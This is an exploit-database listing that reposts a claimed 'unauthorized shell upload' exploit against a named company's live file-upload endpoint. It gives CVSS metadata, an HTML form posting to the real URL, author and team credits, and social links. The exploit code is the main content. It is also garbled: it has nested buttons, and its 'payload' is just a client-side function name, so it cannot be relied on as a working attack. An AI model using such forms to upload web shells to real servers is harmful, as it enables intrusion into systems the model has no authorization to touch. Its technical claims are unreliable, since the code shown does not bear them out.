Advertisement






YemekSepeti Unauthorized Shell Upload Exploit

CVE Category Price Severity
N/A CWE-434 Unknown Critical
Author Risk Exploitation Type Date
Unknown High Remote 2020-03-07
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H 0.95623 0.98762

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020030026

Below is a copy:

YemekSepeti Unauthorized Shell Upload Exploit
Vulnerability Title : YemekSepeti Unauthorized Shell Upload Exploit - Discovered By Gaddar

Author : Gaddar
Team : SiyahBayrak

Payload : Step_VM.uploadFileFor(attachment)

Exploit; 

<form method="POST" action="https://portakal.yemeksepeti.com/attachment/file-up.php" enctype="multipart/form-data" > 
<div ng-if="attachment.FileInformationList.length == 0" ng-init="fileInfo=attachment.FileInformationList[0]">
                            <p class="text-center">
                                <button class="btn-material btn-sm btn-upload mt-29" id="uploadButton_2" ng-click="Step_VM.uploadFileFor(attachment)">
<button class="btn-material btn-sm btn-upload" id="uploadButton_0" ng-click="Step_VM.uploadFileFor(attachment)">
                                    Select File
                                </button>
                                    <i class="fa fa-cloud-upload"></i> Submit
                                </button>
                            </p>
                        </div>

ScreenShot;
https://ibb.co/3B5ZRBR

My social accounts ;
Instagram.com/pt.php
Facebook.com/ptsec
Twitter.com/ptguvenlik
Youtube.com/c/gaddarsec

My Teammates : DeadLy-Warrior - StabilBey - Diablo

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum